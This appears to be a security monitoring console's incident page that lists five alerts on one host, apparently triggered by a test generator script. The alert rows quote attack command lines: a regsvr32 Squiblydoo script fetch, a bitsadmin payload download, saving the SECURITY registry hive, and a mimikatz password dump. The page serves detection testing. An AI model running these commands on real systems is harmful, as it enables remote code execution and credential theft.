Back to list

Critical CINC-20251220-F580C290 new

Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:8795655427

Incident ID CINC-20251220-F580C290

Severity Critical (90)

Status new

Alert Count 5

Host Count 1

First Seen 2025-12-18 19:50:26

Last Seen 2025-12-18 19:51:45

Duration 0d 0h 1m

Created 2025-12-20 13:23

Updated 2026-01-13 15:14

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...

Observed Tactics:

Techniques:

Severity	Status	Hostname	Description	Tactic	Command Line	Time
High	new	TEAHEE	A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line.	Defense Evasion	regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll	12-18 19:51
High	new	TEAHEE	A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree.	Defense Evasion	bitsadmin /transfer j http://127.0.0.1/test C:\Users\dokji\AppData\Local\Temp\bits.exe	12-18 19:51
Critical	new	TEAHEE	A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.	Credential Access	reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv	12-18 19:51
High	new	TEAHEE	A process appears to be launching mimikatz, a password dumping utility. mimikatz's primary purpose is to steal passwords. If credentials were dumped, change your passwords and investigate further.	Credential Access	C:\WINDOWS\system32\cmd.exe /c "powershell sekurlsa::logonpasswords"	12-18 19:51
Informational	new	TEAHEE	A process has written a known EICAR test file. Review the files written by the triggered process.	Execution	"python" mega_incident_generator.py --rounds 2 --interval 30	12-18 19:50